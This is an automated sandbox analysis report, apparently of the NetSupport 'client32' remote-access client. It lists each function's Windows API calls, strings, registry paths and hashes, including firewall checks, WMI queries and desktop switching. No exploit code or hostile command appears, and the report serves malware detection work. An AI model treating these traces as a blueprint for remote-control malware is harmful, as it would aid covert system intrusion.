                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Enum$Open$CloseValue
                                                                                                                • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                • API String ID: 2823542970-1528906934
                                                                                                                • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                                                • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                                                                • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                                                • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                                                                APIs
                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                • GetTickCount.KERNEL32 ref: 111385E2
                                                                                                                  • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                                  • Part of subcall function 11096D90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                                                  • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                                                  • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                                                • GetTickCount.KERNEL32 ref: 111385F1
                                                                                                                • _memset.LIBCMT ref: 11138633
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                                                                • _strrchr.LIBCMT ref: 11138658
                                                                                                                • _free.LIBCMT ref: 111386AA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                                • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                • API String ID: 711243594-1270230032
                                                                                                                • Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                                                • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                                                                • Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                                                • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                                                                APIs
                                                                                                                • wsprintfA.USER32 ref: 11133B70
                                                                                                                • GetTickCount.KERNEL32 ref: 11133BA1
                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                                                                • GetTickCount.KERNEL32 ref: 11133BBC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$FolderPathwsprintf
                                                                                                                • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                                • API String ID: 1170620360-4157686185
                                                                                                                • Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                                                • Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
                                                                                                                • Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
                                                                                                                • Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
                                                                                                                APIs
                                                                                                                • _strtok.LIBCMT ref: 11027286
                                                                                                                • _strtok.LIBCMT ref: 110272C0
                                                                                                                • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _strtok$Sleep
                                                                                                                • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                                • API String ID: 2009458258-3774545468
                                                                                                                • Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                                                • Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
                                                                                                                • Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
                                                                                                                • Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                                                                • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                                                                • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
                                                                                                                • SetThreadDesktop.USER32(00000000), ref: 11103810
                                                                                                                • CloseDesktop.USER32(00000000), ref: 11103829
                                                                                                                • GetLastError.KERNEL32 ref: 11103831
                                                                                                                • CloseDesktop.USER32(00000000), ref: 11103847
                                                                                                                • GetLastError.KERNEL32 ref: 1110384F
                                                                                                                Strings
                                                                                                                • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                                                                • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                                                                • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                • API String ID: 2036220054-60805735
                                                                                                                • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                                                • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                                                                • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                                                • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                                                                APIs
                                                                                                                • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                                                                • GetLastError.KERNEL32 ref: 1115F275
                                                                                                                • wsprintfA.USER32 ref: 1115F288
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                                • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                                                                • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                                • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                                • API String ID: 1734919802-1728070458
                                                                                                                • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                                • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                                                • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                                • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                                                                APIs
                                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                • std::exception::exception.LIBCMT ref: 11110E4A
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                                                • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                                                • InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                                                • EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                                                • LeaveCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110F5F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                                • API String ID: 1976012330-1024648535
                                                                                                                • Opcode ID: 3f1f8e0be68962e051d3ca5ce6726616c1cab505bcdc025fa2b627742035626d
                                                                                                                • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                                                                • Opcode Fuzzy Hash: 3f1f8e0be68962e051d3ca5ce6726616c1cab505bcdc025fa2b627742035626d
                                                                                                                • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                                                APIs
                                                                                                                • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,11180365,00000000,00000000,0BAD89F8,00000000,?,00000000), ref: 110613A4
                                                                                                                • _malloc.LIBCMT ref: 110613EB
                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                • RegEnumValueA.ADVAPI32(?,?,?,00000000,00000000,00000000,000000FF,?,0BAD89F8,00000000), ref: 1106142B
                                                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,00000100,00000000,?,000000FF,?), ref: 11061492
                                                                                                                • _free.LIBCMT ref: 110614A4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                                                • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                                • API String ID: 999355418-161875503
                                                                                                                • Opcode ID: c88c5497aaf0b71f7d616666734417a077c2241501ec168b0270ea83746a62af
                                                                                                                • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                                                • Opcode Fuzzy Hash: c88c5497aaf0b71f7d616666734417a077c2241501ec168b0270ea83746a62af
                                                                                                                • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                                                APIs
                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,0BAD89F8,00000000,?), ref: 1115C927
                                                                                                                • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                                                • wsprintfW.USER32 ref: 1115C967
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                                                • wsprintfW.USER32 ref: 1115CA27
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                • API String ID: 3050498177-823534439
                                                                                                                • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                                • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                                                • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                                • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                                                APIs
                                                                                                                  • Part of subcall function 11145F00: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
                                                                                                                  • Part of subcall function 11145F00: RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                                • _memset.LIBCMT ref: 11146055
                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                                • GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.3710519970.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.3710501511.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710680404.00000000111F1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000111F7000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001125D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.0000000011288000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001129E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112B4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.00000000112DF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.3710699991.000000001132B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
